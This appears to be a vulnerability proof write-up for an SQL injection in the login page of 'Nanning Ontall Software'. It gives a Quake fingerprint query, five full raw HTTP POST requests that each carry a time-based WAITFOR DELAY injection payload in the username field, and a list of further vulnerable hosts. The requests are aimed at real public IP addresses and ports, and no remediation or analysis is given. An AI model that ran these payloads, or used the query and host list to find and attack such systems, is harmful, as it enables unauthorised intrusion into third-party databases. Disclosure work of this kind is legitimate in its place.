Attribution certificate



Quake search：
body="Nanning Ontall Software" 

Vulnerability recurrence:
http://222.180.168.218:8318/login.aspx
POST /login.aspx HTTP/1.1
Host: 222.180.168.218:8318
Content-Length: 324
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://222.180.168.218:8318
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://222.180.168.218:8318/login.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: gxjtusername=; ASP.NET_SessionId=uefbfp45i045vnfqibvpkovh
Connection: close

__VIEWSTATE=%2FwEPDwULLTEyNTE5NTMwNDNkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQhjYnhMb2dpbgUHY2J4VXNlcvF%2B6pyZwEJkrZSx%2FyMuPJIPebdX&__EVENTVALIDATION=%2FwEWBQKduP38AwLWn9eKCALq85jtCQKhnNubCgLMvYm6CSWhO30w0G7oTZQvxWtt87IPYjeA&tbxUserName=%27+WAITFOR+DELAY+%270%3A0%3A3%27--&tbxPassword=1&cbxLogin=on&hdnChild=xyzzy

Vulnerability recurrence:
http://218.65.179.113:8899/

POST /login.aspx HTTP/1.1
Host: 218.65.179.113:8899
Content-Length: 334
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://218.65.179.113:8899
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://218.65.179.113:8899/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASP.NET_SessionId=ycf0ks45hcxqsiixoalms5j5; gxjtusername=
Connection: close

__VIEWSTATE=%2FwEPDwULLTEwNTE0OTc2ODVkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQhjYnhMb2dpbr7ItC4GXQHo4UIf7Sf0v%2BvAJq1T&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWBALMzIeUBALWn9eKCALq85jtCQKhnNubCscDNVfvqOSipV51Tri1K%2BzuYHYx&tbxUserName=%27+WAITFOR+DELAY+%270%3A0%3A3%27--&tbxPassword=1&cbxLogin=on&hdnChild=xyzzy

Vulnerability recurrence:
http://218.65.179.122:8101/

POST /login.aspx HTTP/1.1
Host: 218.65.179.122:8101
Content-Length: 479
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://218.65.179.122:8101
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://218.65.179.122:8101/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASP.NET_SessionId=hpsvq5ju54d2spyicsao132g; gxjtusername=; XPMP_V2=
Connection: close

__VIEWSTATE=%2FwEPDwUKLTMzNzE4Nzg3MGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCGNieExvZ2lu3FkGK3X4e9ODXE%2BE4nYHpTRW%2BWSK4DyjtOKVGdzU4EM%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEdAAXQLoNfGnOLy4ykWDrhOEBQCcv3dah5nNTFGfy3Cbr6xvGnUaknU6WWWdGPJ%2BD6CIW9o%2BQGJR6bEF3HrdvAhuovop4oRunf14dz2Zt2%2BQKDEOMjNMfbI72EptuwLqxvDaAw6Pnzq0oRA9onwLoxwyeM&tbxUserName=%27+WAITFOR+DELAY+%270%3A0%3A3%27--&tbxPassword=1&cbxLogin=on&btnLogin=%E7%99%BB+%E5%BD%95&hdnChild=xyzzy

Vulnerability recurrence:
http://222.180.168.218:7755/

POST /login.aspx HTTP/1.1
Host: 222.180.168.218:7755
Content-Length: 322
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://222.180.168.218:7755
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://222.180.168.218:7755/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: gxjtusername=; ASP.NET_SessionId=uefbfp45i045vnfqibvpkovh
Connection: close

__VIEWSTATE=%2FwEPDwULLTEyNTE5NTMwNDNkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQhjYnhMb2dpbgUHY2J4VXNlcrfPavbVcOKRk4g56axE1VxN9wDP&__EVENTVALIDATION=%2FwEWBQLMva1rAtaf14oIAurzmO0JAqGc25sKAsy9iboJLJr3w1X3ZSMf1ZFGxZwOqy2NJg4%3D&tbxUserName=%27+WAITFOR+DELAY+%270%3A0%3A3%27--&tbxPassword=1&cbxLogin=on&hdnChild=xyzzy


Vulnerability recurrence:
http://222.180.168.218:8357/
POST /login.aspx HTTP/1.1
Host: 222.180.168.218:8357
Content-Length: 324
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://222.180.168.218:8357
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://222.180.168.218:8357/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: gxjtusername=; ASP.NET_SessionId=uefbfp45i045vnfqibvpkovh
Connection: close
__VIEWSTATE=%2FwEPDwULLTEyNTE5NTMwNDNkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQhjYnhMb2dpbgUHY2J4VXNlcowqlmjdqe3tEJp5Ahc2vtn2owa%2B&__EVENTVALIDATION=%2FwEWBQLKlPKyBQLWn9eKCALq85jtCQKhnNubCgLMvYm6CdC0UAupCoJx%2BNwCiRFi4QL4051q&tbxUserName=%27+WAITFOR+DELAY+%270%3A0%3A3%27--&tbxPassword=1&cbxLogin=on&hdnChild=xyzzy

Other examples
http://222.180.168.218:8357/
http://222.180.168.218:8107/
http://222.180.168.218:8386/
http://222.180.168.218:17647/
http://222.180.168.218:8243/
http://222.180.168.218:8287/

